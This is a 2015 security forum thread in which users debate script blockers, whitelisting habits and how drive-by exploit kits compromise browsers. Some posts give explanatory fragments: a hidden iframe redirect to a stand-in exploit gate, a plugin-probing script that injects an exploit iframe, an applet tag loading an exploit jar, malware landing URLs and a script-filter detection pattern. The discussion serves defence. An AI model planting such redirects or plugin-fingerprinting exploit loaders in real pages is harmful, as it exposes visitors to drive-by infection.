Food for thought: safe browsing and blocking scripts

Discussion in 'other anti-malware software' started by Windows_Security, Feb 10, 2015.

  1. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    529
    Hmm, weird. I am using uMatrix in Chrome, but I had to add a lot of (if not all) domains manually, e.g. YouTube, Amazon, PayPal... Maybe I added too many host lists?

    Btw, is uBlock even useful when you already block everything with uMatrix? :D
     
  2. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,466
    IIRC I mistyped a URL and was redirected. I don't recall many details; it was a while back.

    I don't think it was a failure of NoScript, more just something that NoScript was not designed to deal with. Hard to say, as I still don't know the mechanism.
     
  3. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Except for the premade blocklists, that sounds very similar to the ProxBlox merge for Proxomitron.
    The global/domain-specific/site-specific you mention match the Host/Subdomain/Path options of ProxBlox. In addition, the sources of external scripts are listed separately and can be allowed individually on a per-site basis.
     
  4. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    I agree regarding good and bad; that's why I treat all scripts the same: don't trust any, and run them all untrusted under Sandboxie. But unlike you, I don't decide which scripts to allow based on reputation; I allow scripts based on what's required for me to be able to do what I want on the sites I visit.

    Bo
     
  5. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Why is it that controlling scripts and 3rd party connections, and removing ads, trackers, and unwanted content like that Facelessbook "Like" button, is called breaking the internet? As long as you can access the content you're after, it's not broken. IMO, getting the garbage off of the page is fixing the internet, not breaking it.
     
  6. I did not post that. I said that in case of a problem I just allow third party and trust my other security mechanisms.

     As soon as you allow a script with NoScript, you trust it. Those allowed scripts are hosted elsewhere. The ones you allow today could be misused tomorrow. NoScript does not protect you against that. You are falling back on Sandboxie to protect you (which is a wise precaution, since you are using Firefox).
     
    Last edited by a moderator: Feb 11, 2015
  7. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    +1 :thumb:

    With uMatrix, however, you can allow scripts on a per-domain basis. So I could allow, for example, googleapis for a few selected sites that may need it, but not for any others I visit that don't need it to render properly.
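
    For example, the saved rules end up looking something like this (a sketch of uMatrix's rule syntax; the site names are placeholders):
    Code:
    site-one.example ajax.googleapis.com script allow
    site-two.example ajax.googleapis.com script allow
    Everything else stays blocked by the global default.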
     
  8. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    We are doing exactly the same thing; the only difference is that I depend on SBIE for security and you do it with something else.
    For me, any security that I get from using NoScript is like gravy on rice. I told you at the end of my first post the reasons why I believe NoScript is doing security; you might want to read the last paragraph of that post.

    The protection you get by using NoScript is not something you can see from prompts or anything like that. I've gotten a few messages from NoScript about clickjacking problems on some pages, but other than that, NoScript is pretty quiet. I like security like that.

    I do a lot of streaming of live sports games, and the domains that load scripts on those types of sites are pretty nasty. Not allowing 10 out of 13 of them to load scripts when streaming a football game has to make the user more secure. I rarely look up the sites that I untrust/blacklist, but when I have done it, it's not rare to find that many of them have hosted malware recently. I am going to send you a link for a game that I am going to be watching tonight; check it out at game time, take a look at every site that loads scripts there, and then ask your friend whether you are more secure if you only allow 3 out of 10 or 13 when you watch the game. In my case it doesn't make much difference, since I've got SBIE, but for people not using Sandboxie, the difference that blocking scripts makes to security has to be huge.

    Bo
     
  9. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    You are telling it like it is.:thumb:

    Bo
     
  10. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,885
    Location:
    Slovenia, EU
    I agree. Most sites work just fine without running 3rd party scripts. If a site needs some 3rd party scripts to run correctly and I visit that site frequently, I create rules for those scripts. If the same happens on some random site, I just disable uMatrix for that site but don't save the rule. When Chrome is closed, the rule is deleted.
     
  11. Compu KTed

    Compu KTed Registered Member

    Joined:
    Dec 18, 2013
    Posts:
    1,414
    Someone who is more familiar with NoScript's ABE user ruleset could perhaps add more granularity by using this feature.
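
    Something along these lines, perhaps (an untested sketch with hypothetical site names), which would let a site pull content only from itself and one approved host:
    Code:
    Site .mybank.example
    Accept from SELF https://sso.example.com
    Deny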
     
  12. When you allow a script to run, you have whitelisted it. The real problem is that this script is not hosted on your computer but on someone else's computer. When that other computer is intruded upon, the next time you visit that website your script blocker allows this (altered) script to run. So it does not matter how granular or easy to use a script blocker is.
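
    To illustrate (hypothetical domain), the page you trust may contain nothing more than:
    Code:
    <script src="https://cdn.third-party.example/widget.js"></script>
    Your blocker whitelists that reference; the content behind it can change at any moment without the page, or you, noticing.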

    Also, the idea of granularity, of allowing 3 out of 10 scripts instead of 10 out of 10, is irrelevant when you set it against the chance of running into a zero-day exploit which breaks Chrome's sandbox. When I buy a lottery ticket, I increase my chance by 100% when I buy two. Although that is a large relative increase, the absolute chance of winning the 25 million Euro jackpot is still near zero. When you have a choice between facing a firing squad and playing Russian roulette, the Russian roulette option seems better. But you are not in a bullet-facing situation right now; you would first have to be hijacked by some terrorist group.
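
    To put some (made-up) numbers on it:
    Code:
    P(jackpot, 1 ticket)  = 1 / 14,000,000  ~ 0.000007%
    P(jackpot, 2 tickets) = 2 / 14,000,000  ~ 0.000014%  (+100% relative, still ~zero absolute)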

    Hope this explains.
     
  13. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    That's a good point you present, Kees. This has me thinking about drive-by downloads, because they are a threat that utilizes JS, afaik. The potential victim lands on a compromised site, and then, typically I believe, a malicious iframe re-directs the potential victim to a 3rd party malicious site that, correct me if I'm wrong, utilizes JS to launch an exploit kit which fingerprints the potential victim's browser and the plug-ins and O/S it's running on. If said potential victim has not yet allowed scripts from the 3rd party malicious site, how can the exploit kit successfully compromise the target machine?
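
    The re-direct I have in mind is the classic injected hidden iframe, something like this (made-up domain):
    Code:
    <iframe src="http://ek-gate.example/landing.php" width="1" height="1" style="visibility:hidden"></iframe>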
     
  14. MisterB

    MisterB Registered Member

    Joined:
    May 31, 2013
    Posts:
    1,267
    Location:
    Southern Rocky Mountains USA
    Breaking bloated websites is not breaking the internet. People confuse the web with the internet because their only experience of it is through a web browser. By blocking ads, scripts, trackers and so on, you are breaking the corporate control of the internet and reasserting your own sovereignty over your computer and internet connection, as well as your personal privacy. Hardly breaking the internet.

    Script blocking is one of the best security practices, but it works best in conjunction with other good practices. I much prefer that control over what comes through my browser to anything that JavaScript provides. I've found that I prefer the way things work without it most of the time, and sometimes I end up with the ability to fine-tune a web page. For example, I have news.google.com whitelisted but not gstatic.com. This formats Google News correctly but eliminates some annoying drop-down menus. I also prefer the old-style Google menu, so I'm delighted that Google has decided to "punish" us diehards who refuse to abandon Opera Presto by imposing it on us. I'm not breaking anything by using an outdated browser with default-deny script blocking and near-complete ad blocking; I'm formatting web content the way I want it, not the way Google and other large corporations want to shove it in my face.
     
  15. For this scenario, that holds; that is why my friend teasingly asked whether I made exceptions. If the script is blocked, the reward (say, a movie) would not show. Because the user has this website in his/her exclusion list, he/she trusts the website. He/she just wanted to see the rich content, and now for some stupid reason it does not show, so he/she allows third party scripts and voilà, the script of the malicious website starts. When you don't make exclusions, your scenario holds. When you make exclusions and the functionality is broken, why would you not trust a perfectly safe website (at least it was safe in the past)?

    Even cautious people would be inclined to give trust to something they already trusted. So using third party script blockers is good practice, and your scenario holds WHEN the user accepts non-functioning websites. As soon as you start adding exclusions, you are opening the gate again and all your efforts are futile ;)

    And you are suggesting that an exploit kit always leads to success. It only leads to success when your system is unpatched or they have found a new zero-day. This was the reason why AVG Linkscanner was so effective against exploit kits in my test (even with a 1.5-year-old database): the real pros make those kits, and the script kiddies who use them have insufficient knowledge to alter or obfuscate these off-the-shelf exploits.

    Linkscanner is a technology bashed by experts, but it is surprisingly effective in real-world usage (it does not slow down browser startup/browsing); that is why I use it even though I have EMET and uMatrix on board.
     
    Last edited by a moderator: Feb 11, 2015
  16. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    I understand the exploit kit is successful only if it finds a vulnerable plug-in or something else not yet patched. Getting back to the exclusions that could allow the malicious script, even if it's compromised at some point in the future: is this not simply the re-direct, and not the 3rd party site hosting the exploit kit? I guess what I'm thinking is, who cares about the re-direct, because that's not what does the damage. Rather, it's the 3rd party site hosting the exploit kit that is of concern.

    So my question, in order that I understand better: what kind of 3rd party site are we talking about? Is it a site we've whitelisted earlier, or is it likely to be a new site we've never come across before, and therefore not whitelisted?

    Second question: what springs the exploit kit into action if we do happen to get redirected to it? Is it not some iframe of sorts that would act as the launch mechanism?

    BTW, good subject you've brought up :thumb:
     
  17. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Hello wat0114,

    Malware Domain Lists have those sites, and they are not likely to be sites that you have trusted. It has to be a site under the control of the criminals in order to have their malware files stored on that site. That is why the victim is redirected to such site. Here are two (both now return a 404 error):
    Code:
    bank.scarf-it-up.com/gao/maximum/law
    
    qwmlad.xyz:9290/openvpnadmin/popular
    Once you have landed on such a site, it becomes a first-party site, and scripts on that site are first-party scripts (invoked from the site you are on). JavaScript then analyzes your browser/operating system and chooses exploits accordingly. The plug-in exploits I have looked at use both JavaScript alone and JavaScript with an iframe. Here are two different codes for a PDF exploit.

    code1.gif

    code2.gif
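
    In rough outline, the probing step works something like this (a simplified sketch with made-up file names, not the actual code in the screenshots):
    Code:
    // look for a PDF plug-in, then write an iframe pointing at the matching exploit page
    var target = null;
    for (var i = 0; i < navigator.plugins.length; i++) {
        if (/Acrobat|PDF/i.test(navigator.plugins[i].name)) { target = "pdf"; break; }
    }
    if (target) {
        document.write('<iframe src="exploit-' + target + '.html" width="1" height="1"></iframe>');
    }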

    In this example, with scripts controlled by a default-deny whitelist and the site not being trusted, Firefox displays a blank page because the script cannot execute:

    ff-cnsite.gif

    Even if a script runs, if plug-ins are also controlled by a whitelist, the browser will return a prompt (the PDF file will not open automatically):

    ff-pdfPrompt.gif

    Java and Flash exploits will also fail. Here is the code for an old Java exploit -- the .jar file is what runs to download the malware. The script invokes the Java vulnerability.

    java_ff-2.jpg
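
    The invoking HTML in such pages is typically no more than this (simplified, with hypothetical file names):
    Code:
    <applet archive="exploit.jar" code="Main.class" width="1" height="1"></applet>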



    ----
    rich
     
  18. I am assuming whitelisted before, because that was my initial use case. My guess is that 9 out of 10 people would allow the invoked script (or iframe), even if it were smart enough not to display the PDF (in Rich's example) that the user was looking for (they trusted it before, so why change now).

    Most news websites, for example, show rich content hosted on another website (e.g. CNN directs to Turner). After the blank page, or the PDF not displaying (in this example), a user would be inclined to allow third party scripts, since that was the remedy for displaying it the first time; there is no need to be suspicious, because that is what he/she did the last time he/she wanted to see such a PDF (in Rich's example).

    That is why I said: when the user is allowing exceptions, these types of use cases will trick the user into an additional allow of third party scripts.
     
    Last edited by a moderator: Feb 11, 2015
  19. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    One's control over scripts isn't limited to allow or block. Depending on the tools used, scripts can be allowed or blocked depending on their origin, content, etc. With Request Policy, permissions can be set based on where the connections initiated by the script originate, and can be specified on a per-site basis. With Proxomitron, scripts can be blocked based on their content. An example is the "Kill Nosey Javascript" filter that's part of Proxomitron's original filterset. It searches for these terms in scripts:
    Code:
    *(.(referrer|plugins|cookie|colorDepth|pixelDepth|external)|history.length)*
    Any script containing any of these terms is killed. Another filter converts iFrames into links, including hidden ones. In order for a malicious iFrame to work with this filter, the user would have to deliberately click on it.
    IMO, one shouldn't rely exclusively on script filtering, controlling connections, or sandboxing. The best approach is to layer tools that use different mechanisms, then treat it as a package. How well any individual component performs, be it NoScript, Proxomitron, Request Policy, SandBoxie, or whatever doesn't matter. It's how the complete package performs that matters. Script filtering combined with connection control is a strong combination. Running that package in a sandbox or virtual system is even better. Run all of the above on a default-deny configured system and you'll be approaching bulletproof.
     
  20. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    Some excellent feedback from all, thanks! As Rich mentions, I do actually whitelist plugins (click-to-play in Chrome/Chromium). As for the sandbox, yes, I'm running Chromium in firejail on Arch Linux, so although I may not feel bulletproof, I think I see that level of security on the near horizon :) I agree with noone's layered approach, for sure.
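
    (For anyone curious, launching it is as simple as the line below; firejail picks up its bundled chromium profile automatically, at least on my setup.)
    Code:
    firejail chromium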

    But, again, if the user allows these 3rd parties only on a per-domain basis, that will reduce the chances of attack.
     
    Last edited: Feb 11, 2015
  21. MisterB

    MisterB Registered Member

    Joined:
    May 31, 2013
    Posts:
    1,267
    Location:
    Southern Rocky Mountains USA
    This is exactly the right approach. If an exploit got through the script blocker on my system, it would still have to deal with my strict LUA and file permissions. It would most likely give me an error message when it tried to access files without the necessary permissions. I also use hosts files to block domains, so the domain an exploit is using might not be accessible.
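
    One hosts file entry per unwanted domain is all it takes (made-up domains):
    Code:
    0.0.0.0  ek-gate.example
    0.0.0.0  tracker.example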

    Apart from layered security, I am turning towards compartmentalization these days. The computer I'm posting this on is not one I use for financial transactions, for example. I can run it a bit more relaxed than a system that does. If this system is compromised in any way, it is a ten-minute procedure to restore it and the loss is minimal. I don't have a home network set up in my router. All network connections at the LAN level are blocked, and each computer and device connected to the router is an island in the internet sea. If one is compromised, it won't affect the others.
     
  22. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I make no assumptions about user decisions regarding prompts. That is a user problem. I just show the methodology by which the user can have several barriers in place at the gate to prevent the exploit from running automatically.

    However, in the example I gave, this is the scenario I had in mind, which is the way plug-in exploits are set up to work:
    • I go to a site, say a news site, and suddenly I'm confronted with a prompt to open/save a PDF. Now, I didn't go looking for a PDF, so I know that something is not right, so I close the browser. End of exploit.
    You offer another scenario, where, if I understand correctly, I go looking for a certain PDF file on a web site, am redirected to a malware site which offers a PDF, and I allow the file because I'm not suspicious, since I'm looking for a PDF anyway.

    Well, I've not seen such a situation, but it would certainly be clever. However, the trickery should be uncovered, for the PDF prompt shows the URL of the page where the file is stored, and it would not be the original URL to which I navigated:

    ff-pdfPrompt2.gif

    So, if this is what you have in mind, the exploit should not succeed.

    regards,

    ----
    rich
     
  23. Rich, you just proved that the exploit did not succeed, but the user did not get what he thought he was looking for. I am talking about user habits, since the scenario where the original website was intruded upon was discussed in post 37.

    For argument's sake, wat0114 zoomed in on the scenario below. I do not argue that the script blocker will fail, but due to the "trusting third party scripts" habit (1) and the debugging habit (2), there is a fair chance this script will be allowed by the USER.

    Use scenario
    User goes to Site X, which (like CNN, for instance) has video clips that are hosted on Site Y. So I have my script blocker set to allow Site X and Site Y. Now let's say, for argument's sake, that Site X was compromised and a script from Site Z was added. The script blocker would block the script from Site Z, but the news video clips would not show.
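
    In uMatrix-style rules the situation would look like this (a sketch with placeholder names; the first line is the partner whitelisted long ago, the second is what the blocker does with the injected script):
    Code:
    site-x.example site-y.example script allow
    site-x.example site-z.example script block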

    Because you make no assumptions about user habits, the story stops here. I talked about user decisions, which would likely be based on user habits/previous positive experiences, as outlined below.

    (1) The trusting-third-party-scripts habit
    When a user is used to debugging his script blocker, he will look for a cure. Since he already trusted this website, and he knows that referring to partner websites is common practice in the media world, there is a fair chance he would be off guard and start debugging his script blocker (looking for a way to show the news clip). As clearly outlined in the conversation of post 1 (ME: No, I sometimes allow exceptions).

    (2) The debugging habit
    Another complicating issue when debugging a script blocker is that sometimes you need to allow all scripts to find the ones you need, because of the cascading structure of the scripts invoked (as confirmed in post 6). So instead of hand-picking them one by one (when you need two scripts out of seven, in a worst case scenario the 30th attempt is successful), the user is inclined to do it by allowing all (see post 35).
     
    Last edited by a moderator: Feb 12, 2015
  24. @Rmus

    I wonder what your thoughts are on the principles of whitelisting; these are the ones my friend tried to make clear when pulling my leg after I said I allowed exceptions:

    1. A whitelist is a default deny, with a few tested (in a VM) exceptions.

    2. A whitelist should be static; zero changes are best, so change it as little as possible. When a user often fine-tunes his whitelist, it sort of defeats the idea of a whitelist.

    3. Messing with the whitelist when the allowed code is on someone else's computer (as with a script blocker), in a trial-and-error procedure, is a nightmare for any security professional, because the integrity of the system is left to ad hoc user decisions.
     
  25. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Hello kees,

    Well, as I stated, I'm not interested in user habits. I only answered questions by wat0114 regarding how the exploits work, and how they can easily be blocked from running automatically. If the user permits actions to continue following a prompt, that is not the fault of the browser.
    I do not use a script blocker. My browser is Opera, and I use its built-in Site Preferences to control things.

    The pop-ups in my test above were with Firefox. I sometimes used Internet Explorer in testing sites with exploits targeting that browser. I could never get drive-by exploits to work in Opera -- I never figured out why.

    The OS is WinXP.

    ----
    rich
     
    Last edited: Feb 12, 2015